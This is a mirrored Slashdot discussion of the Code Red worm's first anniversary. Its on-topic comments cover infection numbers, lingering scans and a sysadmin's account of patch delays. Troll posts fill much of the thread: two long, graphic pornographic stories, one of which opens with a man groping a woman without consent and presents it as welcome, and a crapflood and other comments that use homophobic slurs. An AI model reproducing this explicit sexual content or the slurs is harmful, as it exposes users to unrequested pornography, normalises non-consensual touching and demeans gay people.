Slashdot Mirror
Happy Birthday Code Red
totallygeek writes: "One year ago today (July 19, 2001), more than 359,000 computers were infected with the Code Red worm in less than 14 hours. At the peak of infection, more than 2,000 new machines were infected each minute. Servers running Internet Information Services from Microsoft were propagating this worm across the Internet faster than anything has up to then or since. For the first time, systems running the Apache web server were getting requests for a document called "default.ida". Here we are a year later, and my web log shows an average of forty-two requests per day for default.ida over the last five days. To really appreciate the spread of this program, look at this animated image."
i win.
I feel so dirty
Mountain Dew is good. Wrong code red? Dang!
Anyway, CLIT sucks.
A True (and fun) Story
I knew my wife was bisexual before I married her. She and her best
friend had been to bed several times in high school, and even
shared a boyfriend a few times. I hadn't had the pleasure of both
of them before we were married, although I did come home one night,
and after kissing Sue, could tell that they'd been to bed earlier.
Our first wedding aniversary was comming up, and Sue asked me what
we were going to do to celebrate. I had planned a nice dinner, perhaps
a stage show or dancing, then back home to screw our brains out.
When I explained, and asked why she wanted to know several weeks in
advance, she simply smiled and suppressed a giggle, her grey eyes
twinkling with an impish gleam. Luckily, our first anniversary fell
on a Friday, and reservations made, we dolled ourselves up and went out
for the evening. Dinner at a fine resturant and dancing at a local
hot-spot kept us laughing and in a good mood. As we drove home, Sue
sitting next to me, leaned over and caressed my thigh with her fingernails,
sending a shiver through me. "You still want to fuck my brains out tonight?" She
cooed. I said yes, I would happily keep her wet and jumping all
night long. When Sue came, no one could doubt that she wasn't
faking. Her tendency to "let go" in bed meant that she was prone
to outbursts of very erotic (and sometimes downright dirty) talk,
as well as moaning and thrashing wildly about the bed. Arm in arm,
we climbed the stairs to our apartment, and once inside, we kissed
passionatly for several long moments, running our hands over each
other and bring desire to a boil. Sue broke the kiss and knelt
straight down, unzipping my pants in the entry hall. She pulled my
hardening cock out of my pants and slipped it into her mouth.
Tounging the underside of the head, and teasing me, I felt my balls
tingle and her wet mouth sliding like wet velvet over my shaft. I
pulled her up to me and kissed her long and hard, my tounge
exploring her mouth, teasing her tounge to follow mine back,
squeezing her tits through her blouse. As I knelt in the hall,
lifting her dress, she leaned back against the wall, bending her
knees and spreading her thighs. I moved the hem of her dress up,
and stared straight at her naked blonde pussy. She had been
dressed in a garter belt and stockings, without panties, all night.
I looked up at her, my warm breath tickling her bush, and she
smiled that special way of hers, telling me she did it for our
pleasure. I dove into her soft moist pussy, licking the glistening
drops of cream from her bush. My tounge parted her moist lips,
feeling the warmth of her, tasting her sweet eagerness. I circled
her clit several times, holding on to her thighs when she tried to
lower herself against my tounge. She pulled me up and kissed me
long and hard, showing me how very hot her passions had become.
She pulled a scarf from her pocket, smiling at me. "Stand still."
She said. "I have a suprise for you." She used the scarf as a
blindfold and led me into the darkened bedroom. I figured she'd
gone out and bought some sexy clothes for me to take off of her. I
heard matches striking, and the fragrance of scented candles
impinged on my senses. "Setting the mood" I thought. She stood
next to my, kissing me lightly on the cheek, her bare breast
touching my arm. Slowly, she began to undress me. Making me feel
every fiber move against my skin. Telling me to stay still, not to
reach for her. She removed my shirt, gliding her hands lightly
over my chest, tickling the hairs around my nipples. She removed
the belt from my pants, slowly pulling it through the belt loops,
making a long hissing sound as it slid against the fabric. She
knelt and started untying my shoes, helping me out of them, sliding
my socks off my feet. Her hands unfastened the snap at my waist,
my zipper already undone, with my cock, hard and straight standing,
waiting to be touched. She stopped and breathed into my ear, her
tounge tracing the edge, warm and wet. "Just a second." She said
softly. I heard her climb onto the bed, moving around on the
sheets. My pants were pushed away from my hips, and I could feel
her hair against my bare thighs as she lifted one leg, then the
other out of my pants. Hands caressed my thighs, sliding up under
the legs of my boxer shorts, fingernails lightly raking under my
boxer shorts. Lips closed around the end of my shaft, with a
tounge lightly caressing the head of my cock. "Tease." I muttered.
Hands quickly pulled my shorts off, making me naked and blind in
the fragrant darkness. I moved to the bed, and her hands pushed me
back against the pillows. I could feel the warmth of her body near
me and I longed to reach out an stroke her. "Just lay back and
enjoy this." She purred. More movements as she positioned herself
on the bed. Again lips encircled the head of my cock, tounge
swirling, wet and warm. The velvety smoothness caused me to moan
softly, and I could feel her warm breath against my skin. All at
once she swallowed my cock, deeply, into her throat. She'd never
before been able to 'throat' my seven inches, and I gasped loudly
as her lips tickled the hairs at the root. Rising slowly, lips
tight against me, she flicked her tounge back and forth over the
muscular ridge under my cock. I moaned my pleasure, letting her
know I enjoyed this and wanted more. My hands reached out, only to
be slapped away. I laid back and enjoyed the sensation of my cock
being swallowed over and over. Slowly. Lovingly. She began to
move quickly, her lips lightly touching the shaft, her saliva
making moist noises as she changed directions. Using only her
mouth, she pumped my cock up and down, her efforts shaking the bed.
Several fast strokes would be followed by a long plunge. Taking me
deep into her throat, she'd pause, letting me know how deep I was,
feeling the tightness of her mouth. The velvety smooth, slick skin
in the back of her throat caressed the head of my cock, feeling
sooo very nice. Then she would pull up quickly, and repeat her
fast strokes, again, only to plunge long and deep. She didn't touch
me except with her mouth. Her hands I could feel near me on the
bed, her hair not touching me as it normally would. Lacking any
other distractions, my world consisted of my cock and her mouth,
eagerly trying to suck me off. I could feel my cock trying to
stiffen even more, as my balls tightened and tingled.
"Unnghh...I'm...gonna...cum!" I panted. Her pace quickened, her
saliva dripped onto my balls, feeding the fires in them instead of
quenching them. My hips moved up, a primitive instinct taking over
control. I want to come in her mouth, give her all of my sperm,
never wanting to stop. The dam broke, Vesuvius erupted, the floods
came. Sperm rushed from my cock as she held me about half way into
her mouth. Spasms wracked my body as come surged from me. After
the fourth surge, I felt her let go and put my spurting rod against
her chest, rubbing me back and forth until I spent myself.
Breathing heavily and moaning, I began to relax; to drift into that
warm "afterglow" of total contentment and relaxation. I felt her
hips move over mine, as she sat just over my lower stomach. Her
hands untying the blind-fold. As the scarf fell away, revealing her
slim form and pale skin in the flickering candlelight, I looked at
her smiling above me, wearing only her garter belt and stockings.
As she sat, almost grinning at me, I realized that her chest and
tits were dry, yet they should have been shiny and wet with white
drops of come. "Did you like that?" She laughed huskily. "Mmmmm,
yessss!" I replied, still feeling the "glow". I a sudden motion,
she moved off of me, laying on her side next to me. "You'd better
thank her then." Sue laughed. I looked down, and laying
alongside my legs, I saw Karen, Sue's best friend and lover,
naked, except for a red bow tied around her neck, her breasts
twinkling wetly in the dim light, her tounge licking her lips. She
smiled at me, her light brown hair seeming to glow as a candle's
light tried to weave its way through. "Happy Anniversary love!"
Darlene laughed, kissing me on the cheek. I grabbed her and kissed
her back, hard and rough, as much to thank her as to tell her that
I'd wished I'd known it wasn't her. Sitting up, I pulled Karen to
me and kissed her too, tasting the salty remnants of my come on her
tounge. "That, sweetheart, " I said to Karen, "is for that
tremendous headjob!" Karen laughed, telling me how much fun it was
to suck me while I thought it was Sue going down. Sue told
her it would be a few minutes until I was ready again, indicating
my flacid cock. "Well, I certainly got all worked up over that."
Karen said. Sue had her lay back, and as I watched, laid
herself down between Karen's thighs. Her blonde hair and fair skin
contrasting to the darker skin tone of the brunette. She slid her
hands under Karen's thighs, as her mouth found the moistness
between them. Karen crossed her ankles over the middle of
Sue's back as a tounge caressed her warm, damp flesh. As I
watched, I could feel my rod begin to straighten, getting harder
and fuller as Darlene moaned softly between Karen's thighs. A
candle on the headboard illuminated Sue's creamy ass, and I
could see a glistening reflection deep between her legs. She
continued to suck, her hands reaching up to pinch Karen's dark
nipples, squeeze her full breasts, caressing the soft tender area
on their undersides with her fingers. I placed my hand on the back
of her thigh, sliding up halfway to her asscheek, stopping to give
her thigh a gentle squeeze to let her know I was enjoying her
"show". She moaned again, wiggling her ass slightly. Karen's face
was one of concentration. She was laying back, trying to
concentrate on the pleasures Sue was giving her, her legs
locked tightly over the more delicate girl's back. I moved my hand
up, cupping Sue's asscheek, pushing it up and away from me.
The second time I did that, I heard a wet "smack" come from between
her legs as her wet pussy lips parted stickily. I leaned over and
began to alternate lifting each asscheek, pushing them together and
pulling them apart as I did. It took only seconds to cause her
pussy to make its approval known with wet noises. The candle light
on her lips showed twinkling droplets of juice forming in her
golden bush, moist and inviting. Her lips were full and beginning
to swell as a white pearlescent drop began to peek from her cunt.
My handling of her ass was driving her crazy, as she sucked and
licked Karen's pussy. Her soft moans indicated that she liked me
feeling her ass, and that she wanted to make Karen come. Karen's
legs suddenly closed around Sue's head as her hips lifted off
the bed, carrying the blonde covered head with them. I watched as
she stayed locked like this, her legs quivering, her breathing a
series of short loud pants, until, finally, she collapsed on the
bed. Sue caressed the dark bush and pussy, kissing it lightly
several times in different places, causing Karen to ripple with
shudders each time. When she sat up, she crawled down toward her
friend, kissing her tenderly on the lips. "I love to eat you like
that." Sue said softly. Karen replied lazily, "Ummmm, I love to
cum in your mouth too." Sue slipped off the foot of the bed and
walked around to me, sitting on the edge of the bed. We grabbed
each other and kissed passionately, our tounges tasting Karen's cum
together. I licked the slick wetness from her chin and neck,
squeezing her small tits and pinching her nipples. As our mouths
parted, we looked into each other's eyes. "See what a wanton slut
you married?!" She laughed. Her use of the word "slut" told me that
she was incredibly turned on. In the year we'd been married, she
only used that word in bed when we had kept teasing each other,
increasing our lust to a franticly high level. "Yes, I can see what
a slut you are." I replied, playing on her horniness. "I saw how
wet your cunt was getting while you fucked her with your tounge."
"Oooh, yesss, I'm sooo wet. See?" Her hand rose from her moist
lips, the fingers glistening with a thick cream as she showed me
her hand. "I'm sooo wet! Having you watch me suck pussy has me
ready to cum!" She purred again, as she rubbed her own slick juice
over her nipples. I leaned down, my tounge circling her nipples,
licking her cream from the hard tips. I sucked a nipple into my
mouth, pulling hard as my hand slid between her thighs. "Hmmm, suck
my tits." She whispered. "Lick my nipples." I slipped three fingers
into her sopping pussy, feeling her warm wetness ooze down into my
hand. My cock touching her stomach caused her hands to encircle it
and begin a slow stroking. "I want to watch my wet slut rub her
pussy all over Karen's tits. Make her nipples all wet and creamy.
Watch as my slut tries to fuck those nice big tits. Can you feel
how wet they are? How wet your thighs are?" Her head tossed back
as I crooned our "bedtalk" too her, her mouth open slightly, she
moaned and hissed her reply. "Yesss. Fuck her tits...her wet
creamy tits...cumming on her titssss." I glanced at Karen, laying
back, watching us as she stroked her pussy. I kept my three fingers
in Sue's dripping cunt as I renewed her lust. "She's watching
you now...She's watching your cunt cream in my hand...Your
girlfriend wants to lick your dripping pussy...She wants you to cum
in her mouth this time...make her face wet." Sue looked at me
with a primal, carnal lust. She grabbed my head and kissed me
hard, her tounge shooting into my mouth barely after my lips
parted. She pulled back, and wordlessly move away, my fingers
sliding from her very wet pussy. She crawled down to Karen,
pausing to look at her naked form. She turned around, lifting her
ass and throwing one leg over Karen's body. Then, while she lowered
herself onto Karen's left breast, I could see drops of her juice
actually dripping onto the nipple, just before her blonde bush
covered it. Looking directly at me, she began to rub herself
against Karen's tit. Her pussy making wet smacking sounds as she
moved faster. "I love to see you naked," I said, "with your cunt
sooo wet and horny." "Naked? I'll show you NAKED." She said. Her
arousal was complete and high. She ripped the garterbelt from her
waist, tearing her stockings. Without lifting off Karen's nipple,
she began to tear the stocking from her thighs, shredding the
fabric. "Strip me. Strip me naked. Get me naked." She panted. Karen
pulled the stockings from Sue's legs, as this carnal blonde
fucked at her tits. "You wanna see me cum?" Sue said, looking
at me with glassy eyes. "You wanna see me cum on her tits? On her
face?" She slid backwards up to Karen's mouth, her nipples standing
up like small cylinders from her breasts. Her panting loud. As
she sat on Karen's face, she moaned, then commanded; "Sssuck me!
Yesss, eat my pussy. Make me cum. Make me cum in your mouth!!" I
moved over to her, her eyes half-closed, hips rocking furiously. I
kept up the taunts hoping to send her over the edge. "You're such a
hot carnal slut -- getting your twat sucked by a girl, your naked
in bed with your girlfriend's tounge in your cunt, and you're going
to cum...getting all wet for HER tounge in you...why don't you show
me what a hot slut you are and eat her cunt too?" "Ahhhnngg"
Darlene moaned as she fell down between Karen's open thighs. Her
hands pushed the tanned thighs apart, as she shoved her face
tightly against Karen's soaked pussy. She rocked her face back and
forth, tounge extened, making wet slurping noises. "Ooooh that's
sooo HOT!" I crooned to her, "Watching you rub your face in her
cunt...I'd love to have a picture of you, naked, your legs spread,
her tounge in your gushing wet pussy, while you rub her cum on your
face." She stopped sucking Karen, her head arching back, mouth
open, her eyes closed. Short sounds escaped from her lips as she
neared her moment of triumph. "Make her face wettt babee...CUM in
her mouth...make her face WET with your cum!" I encouraged. She
started comming, thrusting her ass against Karen's mouth, her body
first falling flat, arms splayed out, then she was upright, her
hips shaking and her body twitching as she received little electric
shocks through her clit. "Huh! Uh! Huh! Huh! Huh!" were the only
sounds in the room except for the wet noises Karen was making
between her soft thighs. She fell off of Karen, still shuddering
and moaning. Her lust only partly sated, her eyes fell on us.
"Quick Karen," She panted, "fuck him. I wanna watch you FUCK! See
your cunt FUCKED by his cock!" We moved together, Karen on her
knees, and I slid into her pussy easily. Karen's pussy was so wet
that I had trouble feeling anything as I pumped her hard and fast.
She ground her hips against me, trying to bury me deeper in her
smouldering cunt. We pounded each other, her cheeks rippling after
each thrust, her tits bouncing, until I felt her hole tighten
around my shaft. I plunged as deep as I could, splaying my legs
wider than hers to get some leverage as I drove it deep against her
cervix. Karen collapsed against the bed, her legs straight and
locked together tightly, her moans and cries announcing her orgasm.
I lay still until her contractions eased on my cock, then I started
slow movements, drawing my cock slowly from deep inside, then
quickly plunging back. "You're...still....hard?? Unngh." She said
as I lowered my cock back to the depths of her cunt. Sue pulled
me off of her brunette friend, eyes still filled with lust, as my
cock slipped wetly from between Karen's cheeks. "I'M going to make
you cum and cum and cum." She announced proudly. With her
proclamation, she laid down and began to suck my cock, licking
Karen's juice from my balls with a greedy tounge. Karen looked and
made a comment about her being greedy, and a kinky idea hit me.
"You want me to fill your mouth with my jism?" I asked Sue.
Her moaned response was a definite yes, as she laid under me, playing
with her clit. Her hands were a blur over her light bush as she
continued to suck me into her mouth. I pulled her into position
having to forcibly remove my shaft from her eager mouth. I laid
her on her back, sitting almost upright against several pillows as
I straddled her stomach. She leaned forward to suck my cock, but I
pulled back away, denying her. I had Karen sit next to us and
placed her hand around my cock, showing her the best grip with
which to jack me off. I sat back, resting not quite on Sue's
stomach, and reached behind me to stroke her drenched pussy as
Karen began to pump my shaft. I told my wife that Karen was going
to make me cum in her mouth. That her best friend was going pump
my cock until I came in her mouth, feel me cumming as she sucks the
cum from me. I leaned forward so my cock entered her mouth, as
Karen pumped me. Karen used her thumb and forefinger, pulling
tightly around my cock, pulling the skin with her as she stroked.
My fingering of her pussy made my wife greedy and she wanted to
suck me herself. Several times Karen pulled me out, and still
pumping my cock, kept it away from this carnal blonde until she
started to behave. I reached down and stroked Karen's bush since
she was doing me, and she leaned over and sucked my nipple.
Karen's pussy was still wet and slick, her thighs wet from
Sue's frantic licking. A look came into her eyes, and she slid
her body down to lay on her side next to us. "Mmmm. Lick the head."
She instructed. "Lick any cum from the head as I get him off. I'm
gonna pump him into your mouth...fill your mouth with his hot
spurting cum...I want to watch while he cums in your mouth."
Sue was sucking too much into her mouth, so Karen took me out
and teased her with it, rubbing me against the side of her face,
making her swing her head from side to side while she chased it.
"Mustn't take too much." Karen warned as she slid me back into
Sue's mouth. "C'mon you naked little bitch, let him know how
much you want him to cum. Make him cum in your mouth as much as he
did in mine. Can you feel his balls rubbing your stomach? Those
cum filled balls...rubbing on you?" I felt a well know sensation
rising from those balls too. I was getting closer as these two
teased. "After he gets hard again, I want him to fuck you from
behind while I eat your pussy. I want to taste his cum inside
you...suck it from you, drink you both.." Karen was stroking at a
steady pace, but I wanted faster and told her to go faster, to make
me cum. At the speed she was moving her hand, Sue had to pull
back to just beyond the end of my cock to keep her lips from
getting bruised. This left me looking at my naked wife, her grey
eyes filled with a primal lust, mouth open, her tounge eagerly
awaiting the arrival of the first drop as Karen sucked at her
nipple. "Ohh God...I want to...Cum!" I panted. "Yessss!" Sue
hissed back. "Shoot your hot thick cum in my mouth. I want you to
fill my mouth. Shoot your jism all over me! Shoot your jism...
let me drink you...drink your cum..." Karen chimed in with "That's
it...tell him...I'm going to suck your wet cunt while you swallow
his cum...suck you and make you wet and horny again. I want your
slick cum on my face while he shoots his load in your mouth... your
wet juice, his cum, all over us..." "Ohh, NOW!" I shouted, "I
gonna...CUM...NOW...CUM!" I felt a surge well up inside me, a rush
of cum flowed from the end of my cock into Sue's open mouth.
She moved forward against the torrent, taking me into her mouth.
Karen held on to my cock, holding her hand in one place while I
bucked and worked more cum into my wife's hot mouth. Sue was
wimpering and moaning as I shot another flood into her mouth, my
cock twitching and throbbing. Another pulse exited my cock into
her mouth. I could feel the warmth of my cum still in Sue's
mouth, exciting me. Karen pulled my cock from Sue's mouth,
jacking me off onto my wife's tits, while her voice dripped with
lust, "Cum on her tits...yeah...all over her tits...make her your
wet little slut..." Sue grabbed Karen's head and pulled her
down for a kiss, cum dribbling from the one corner of her mouth.
As they kissed, more cum leaked past their lips, as Karen rubbed my
cock over my wife's chest and tits. As they parted, I heard them
both swallow, Karen pulling my wife up from the bed to wipe the cum
from her face with my softening cock, which Karen then sucked into
her mouth. I collapsed on the bed and watched as they both licked
each other off, and started touching and caressing each other.
Later, I made love to each of these wonderful women, seperately,
and together. When we were all finally sated, we cuddled and
kissed, falling asleep together, content and smiling. From that
night forward, Karen was always invited for a birthday or an
anniversary party.
OMG BIG PENIS ATE MY SOUP
That animated gif is going to be /.'d before I get this posted.
I do security
Yet another crippling bombshell hit the beleaguered trolling community when recently Slashdot confirmed that, after several changes were made to production Slashcode, wide posts account for less than a fraction of 1 percent of all Slashdot posts. Coming on the heels of the latest verions of IE which make page-widening more difficult, this news serves to reinforce what we've known all along. the wide posts that we love are collapsing into the narrow posts that we are used to, as further exemplified by the lack of Slashbots complaining about difficulty reading Slashdot's articles.
You don't need to be a Klerck to predict PWP's future. The hand writing is on the wall: PWP faces a bleak future. In fact there won't be any future at all for PWP because PWP is dying. Things are looking very bad for PWP. As many of us are already aware, PWP continues to be defeated by users with thresholds of 1 or higher. Mod points flow like a river of blood. Klerck's PWP-bot posts are the most endangered of them all, having been filtered early on because of their uniformity.
Let's keep to the facts and look at the numbers.
PWP leader Klerck states that there are 7 wide posts in the average Slashdot article. How many non-wide crapflood posts are there? Let's see. The number of crapflood versus wide posts on Slahdot is roughly in ratio of 5 to 1. Therefore there are about 7*5 = 35 non-wide crapflood posts in every Slashdot article. Tacosnotting posts on Slashdot are about half of the volume of crapflood posts. Therefore there are about 17 tacosnotting posts per article. A recent article put Goatse.cx trolls at about 80 percent of total troll posts. Therefore there are a hell of a lot of homosexual trolls. This is consistent with the number of Goatse.cx Slashdot posts.
But Slashdot is only part of the picture. Due to the troubles at Slashdot, negative revenue and so on, the site will soon go out of business and many users will flock to alternative weblogs, where PWP is almost completely unknown. Trollaxor.com, the popular troll hangout, is also dying, its corpse sodomized in yet another Greek bath house.
All major surveys show that PWP has steadily declined in the scope of all troll posts. PWP is very sick and its long term survival prospects are very dim. If PWP is to survive at all it will be among Blog faggot using outdated versions of Slashcode. PWP continues to decay. Nothing short of a miracle could save it at this point in time. For all practical purposes, PWP is dead.
- posted by poopbot: because we're all crapflooders at heart
8q4ztSyovV Post #287
That is pretty sad when you can't even get first post on your own post!
Click here or here.
Story 4 minutes old and image is /.ed.
i dont appreciate the fact that it spread quickly, especially since i had to fix a fucking computer on my network, mainly because it was my moms computer and it was virus loaded, but still, i dont appreciate gay viruses, i appreciate the fact that someone was smart enough to create it, but definitely dont appreciate them putting it out
Righteousness postpones the inevitable
http://burningaureole.caveism.net
oops false alarm
It is the gift that just keeps on giving.
This virus was not exclusive to Microsoft. It also infected computers runing DG/UX and apache. Of course I wouldn't expect Slashdot to report that.
...that on the anniversary of an attack which paralyzed servers dead in their tracks, we hear the far-away screams of agony from the lone sysadmin of missingleftsocks.com as 100,000 slashdotters pillage his machine simultaneously.
Don't worry about Code Red and related problems. I'm sure Microsoft will fix everything before they start storing our National ID information.
In Capitalist America, bank robs you!
One year anniversary was last week some time. We had been running DeepSight (nee ARIS) in a test mode at the time, and actually detected some test runs of Code Red about a week before the big outbreak.
Folks will notice though that the fixed version of Code Red I (CodeRed.B) is still going. Picked up a couple of hits today.
It's been a year since the most devastating virus spread across the internet like wildfire - and to this day, Microsoft still insists that such things are the fault of the user, not the software.
My server is still getting hit by code red infected
servers on the avarage of every 5min. It would seem
that after all of this time people would clean up their servers. What really bothers me is some of the machines hitting me are commercial web sits verses the home machines.
Does anyone really care? Come September 11th, 2002, I wouldn't be surprised if /. didn't post a story about the attacks - yet we post more anti-microsoft bullshit. Get a life folks.
Servers running Internet Information Services from Microsoft were propagating this worm across the Internet faster than anything has up to then or since
Granted, the 'Net was a lot smaller, but what about the Morris worm?
General Relativity: Space-time tells matter where to go; Matter tells space-time what shape to be.
It really was good pizza...and it was quite a bit of fun riding skateboards around the corporate HQ at 2:30am in the morning...
Seriously, though, it also taught the company I work for a serious lesson about staying on top of this kind of stuff. We had just finished a 2 month project to secure our web servers, but we were still bound by our traditional change management processes - 7 days notification for an outage, and testing of all changes documented and submitted for approval in advance. At the time Code Red hit, I had sent a note saying "we've really got to get this hotfix applied", but we were bound by the process, and we got burned.
Needless to say, when an urgent hotfix comes out now, it takes almost no convincing to get it applied ASAP. If it breaks a web app or two, well, that's the risk we take. We'd rather look for signoff from the business to unapply a hotfix that breaks something, than spend a few days trying to secure the approval beforehand. It's a lot cheaper in the long run to troubleshoot the effects of a hotfix that has unintended side effects than it is to watch your entire web farm get demolished by a worm.
Yes, we run IIS, and I suppose you could harp about how this could all be avoided by running Apache, but the point is that without a policy, strategy, and process for rapidly deploying defenses against net-born attacks, no system is invulnerable.
from the original analysis by David Moore:
.FLI) .mov {requires QuickTime v3 or newer} )
UK Mirror
UK FTP
AU Mirror
Flipbook animation (207k
Quicktime animation of growth by geographic breakdown (200K
original www.caida.org gif animation
HIV Crosses Species Barrier... into Muppets
What exactly are we supposed to celebrate? The inept SAs that have failed to patch their systems? The sad lack of software development skills and abundance of corporate greed that combine to push shoddy software upon millions of users?
Maybe we should celebrate the resiliency of the Net. The fact that while attacks on systems continue to come daily, and at a seemingly increasing rate, everything still works most of the time.
--knowledge, not information, is power
You you have a liscense for that GIF?
"All art is quite useless." -- Oscar Wilde
It's amazing how Microsoft on their IIS website can make an inferior product look so nice, friendly, usable and safe - when there is a free alternative that lacks the slick advertising but that is a much superior product, especially in security.
Linux is a safe haven. It's like that story from church about building your house on the rocks rather than the sand, so that when the tide rises you will be safe. Or like people who built a bomb shelter. Or like those who painted their doors with lamb's blood so the angel of death would pass over their house and not kill the first-born son.
I am immortal! The tide of red sweeps daily over the internet and I didn't even get my shoes dirty!
Just a side note, if anyone ever came up with a virus that was as devastating to apache as code red was to IIS, I think Linux would be doomed. If you expect something to fail (Microsoft products) then you don't care too much when they do. But if a product is touted as being absolutely secure and stable (Linux/Apache) then when it does screw up big, it will probably be it's death. The higher up you are, the further you have to fall.
whoops.. credit where credit is due: Jeff Brown did the animation based on the paper (linked above) by David Moore.
HIV Crosses Species Barrier... into Muppets
The fact that Code Red is still running around the way it is proves for a fact that we, as human, are just lazy.
http://www.maximum-cars.com - My little hobbie.
I'm Tommy. I'm 20 and live with my parents in a condo near the Beaches, when
I'm home from college for the summer and during vacations during the school
year. Early last summer I was looking for a job, so I went to one of the
joints on the beach where a lot of contractors like to hang out. During one
of my visits I started talking to Chuck who does a lot of odd jobs around the
area. He told me he could use some help, and since I didn't have anything
steady yeat I decided to work with him the next day.
He picked me up at 8 o'clock sharp and we headed north along the coast highway
to do some work for Sherri and her husband. The houses where they live are
pretty isolated, and the nearest neighbors were at least half a mile away.
Sherri answered the door. She looked like she was about 26 or 27. She was a
brunette and looked like she had a real a cute little body. She showed us the
work they wanted done on the pool and we got started. We'd been hard at it
for about three hours when she walked out with three beers and said that we
should take a break.
The beer looked great, but what instantly grabbed my attention was the bikini
she was wearing. It was the smallest suit I had ever seen - and it didn't
leave much to the imagination. It barely covered her nipples - leaving a lot
of tit exposed, and was cut so small in the crotch that quite a few cunt hairs
were exposed - sticking out the sides. In fact, I wondered what kept it from
slipping up inside her snatch. Chuck looked at me and I looked back and
winked at him.
It's a good thing I was wearing baggy cut-offs, because my cock was a full
attention, and I'm sure his was too. Sherri was getting her sun and talking
to us at the same time. She told us what a nice job we were doing. When 4
o'clock rolled around we weren't done, but the end of the day was the end of
the day. In the truck on the way back Chuck told me, "That pussy can be had."
I answered, "Don't you wish!"
The next morning we got there early. Sherri was wearing a pair of cut-offs
and a cropped t-shirt that just reached the bottom of her tits. Instant
hard-on time, again.
About 11 she asked if we would like a beer. Sure we did, and into the house
we went. We drank our beer and she had a few wine coolers while she told us
about another job in the house she wanted done, and asked if we would look at
it.
We followed her into the living room. There was a ladder - that she climbed
to show us where they wanted some shelves installed. While she was up on the
ladder I was able to look right up into her cut-offs... and see her hairy
pussy. When I tore my eyes off her bare crotch I looked up - and there were
her tits - nipples popped out and pushing against the thin cloth of her
t-shirt.
Chuck reached up, and pushed his hand into the leg of the cut- offs and onto
her pussy and said, "I think this might need fixing some too."
She started to say something, but sort of croaked. She couldn't seem to get
the words out. Chuck lifted her off the ladder and kissed her as he carried
her to the couch. He sat down and asked, "How would you like to feel my cock
in your mouth?"
Before I could say a word she was unzipping Chuck and had her top off. He
sucked her tits while she sucked his cock. Then she turned to me. She sucked
me down to the balls while Chuck pulled off her shorts and started licking her
cunt.
She was moaning as Chuck licked her clit. She pulled my cock and said to
Chuck, "Eat me..... Yes, eat me.... I'm coming...!", as she finished me off
with her hand.
Chuck and I changed places and I licked my way up her thighs to her pussy and
then I started concentrating on her clit - until she came twice more.
Finally, she said, "I need a cock in me! Somebody please fuck me!"
I opened her thighs even wider, and slid my cock into her hot cunt. She was
so wet that I slid right in... all the way to my balls on the first thrust.
It wasn't long before sperm started pushing it's way out of my balls, and I
came - splashing my load into her.
Chuck wasn't finished yet though. She sucked our cocks alternately until we
were both hard again. Chuck lay on the floor and she straddled he - sliding
down - taking him all. I started sucking her tits to get her going, while she
rode Chuck's cock.
I sat her up straight, and slid my cock between her tits, pushing them
together. Her tits were jerking me off, as she bounched up and down on
Chuck's rod. Soon, she was shouting,"Yes, yes! Fuck me good! It feels
soooooo good.. Fuck me!!"
While Chuck's cock was sliding in and out of her pussy, mine was sliding up
and down between her breasts. She came a couple more times before Chuck
grunted, saying, "Here it comes, Baby!" She came with him, and I shot my load
on her tits and into her face, showering all three of us with come.
After we cleaned up, we told her we would come back the next day to finish the
jobs she had in mind.
On the way home, I asked Chuck if he though she would tell her husband that
we'd fucked her. Chuck said not to worry. It wasn't the first time he'd
fucked a lonely housewife who was being neglected at home, or just wanted some
strange cock.
The next morning we arrived about 8 o'clock and Sherri invited us in for a cup
of coffee before we got started. She was wearing just a housecoat, and Chuck
had that off in no time.
She told us to get naked because she was ready to suck cock. I got down
between her legs and started eating her while Chuck sucked on her breasts.
She came on my tongue and drank down every drop. Chuck was ready to fuck her,
so he took my place between her legs. He shoved his cock right in and she
moaned. I let Chuck work on her, knowing that he was good and hard. Then I
heard him groan as he shot off in her cunt. She was thrashing and screaming,
"No! Not yet!" But, it was too late. Chuck had already pumped his load into
her.
She looked at me and said, "Stick in in. I'm nearly there!" So I did. I
fucked her slowly until she was screaming in my ear to make her come. I kept
on fucking until she was really ready, then I came right after she did.
I was getting late and we had the job to finish. We didn't want her husband
to get suspicious - because the job was taking so long, so we finished up
about 4:30. We left, but not before she gave each of us a good-bye blow-job.
Then, two weeks later we decided to take Friday off, so I called Sherri. She
said to come by for a beer and a swim. I didn't pass up an opportunity like
that...... Wow! What a day!
Can someone set up a mirror or two before we loose it please??
-------
Drink Coffee - Do Stupid Things Faster And With More Energy!
From the official #python@OPN quotefile:
<skreech> I'm gonna miss code red when its gone, my webpage has never gotten this many hits before
I find it horribly absurd that Americans are still whining and crying over 9/11. Every time I turn on the television, its 9/11 this and 9/11 that. Its gotten to the point that even things that are completely worthless are somehow connected to 9/11. For example, someone told me that they will only shop at the cheaper non-brandname clothing stores because of 9/11. I asked them what 9/11 had to do with it and the response was a shrug. I hate the fact that people are running around like scared sheep. Everywhere I look, more "public security" is shown but in the end I don't think this will change anything. People have let there destroyed egos of yesteryear that chanted "America the strong and invincible" have made way for the public to curtail their freedoms for the desire of security. What they do not realize is that the freedoms we are given in this country aren't just for the good times but also for the bad times. I mean, an anology can be made that a 'friend in need is a friend indeed' because what matters more is not how much freedom (or in this case friends) we have, but how much freedom (or friends) we have when times are tough. People like Ashcroft should be taken out of office and charged with allowing the destruction of civil liberties. I'm sure its even worse for our fellow Americans who may happen to look like Middle Easterners or may be Muslim since the floodgates of racism and prejudice are wide open. First it was the Japanese and I'm pretty sure Muslims and anyone resembling a Middle-Easterner will be next to go through that.
I guess your post touched a nerve. Sorry for the rant, but come September 11th this year, I hope I don't see a story on Slashdot. What our country needs to do is look to ourselves and understand what we may be doing wrong in the world for people to hate us so much. Those interested in a history lesson can come back later when I feel like typing some more.
Long live a free and just America in a happy and just World.
DShield's Code Red Anniversary Page has an interesting graph showing scanning activity they've detected from active hosts since the beginning of this year. Some 35,000 IPs still continue to regularly come alive around the beginning of the month, quiet down towards the middle, and then resume the cycle again - the numbers have remained remarkably consistent.
And yet, just a few discussions down the /. front page, there's this massive collective rant, questioning the gov't's motive in releasing something that they claim is designed to help secure people's boxen. If the gov't software were just to stop code red and nimda from moving so fast, wouldn't that qualify as "public interest" enough for them to do that, just out of the goodness of their hearts?
Apologies for twisted grammar of preceding para. /me needs sleep, badly!
"The best argument against democracy is a five minute chat with the average voter."
--Winston Churchill
4,375,130 bytes long. :)
It's either really detailed or someone wanted to play a dirty trick on the admin.
I'm still downloading it, at about 1.5k/second.
Click here or here.
It may be offtopic, but he sure has a point.
June 18, 2001 14:29:28 -0700
Microsoft Security Bulliten MS01-033
June 18, 2001 14:36:53
q300972_w2k_sp3_x86_en.exe
